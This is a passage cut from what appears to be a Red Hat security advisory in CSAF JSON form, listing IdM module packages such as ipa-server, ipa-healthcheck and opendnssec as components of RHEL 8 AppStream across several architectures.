"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch"
},
"product_reference": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src"
},
"product_reference": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch"
},
"product_reference": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src"
},
"product_reference": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
